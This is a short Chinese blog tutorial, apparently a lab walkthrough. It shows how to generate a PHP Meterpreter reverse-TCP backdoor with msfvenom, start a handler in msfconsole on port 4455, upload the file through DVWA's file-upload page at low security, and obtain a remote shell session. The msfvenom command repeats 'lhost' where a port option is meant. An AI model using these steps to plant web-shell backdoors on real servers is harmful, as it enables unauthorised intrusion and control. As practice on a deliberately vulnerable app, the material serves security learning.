metasplot之php后门

***metasploit 之上传php后门
打开kali
输入msfvenom -p php/meterpreter/reverse_tcp lhost=内网ip地址 lhost=4455 R> shell.php 生成一个php文件木马.
metasplot之php后门_第1张图片
新建一个终端 输入msfconsole 打开meterpreter 使用手动监听模块, 设立攻击载荷 ,设立 监听端口,设立端口为4455
metasplot之php后门_第2张图片
打开dvwa 我用的是owaspbwa下的dvwa,可以自行搭建一个dvwa.
metasplot之php后门_第3张图片
安全度设置为低.metasplot之php后门_第4张图片
打开文件上传选框,上传我们的shell.php(也就是制作完成的木马)
metasplot之php后门_第5张图片
上传成功.
在这里插入图片描述
自己打开网站下shell.php
在这里插入图片描述
反弹成功!
metasplot之php后门_第6张图片
先ctrl+c退出 然后 进入sessions -i id号(我的是4)
已经拿到目标shell!

你可能感兴趣的:(信息安全,shell,php)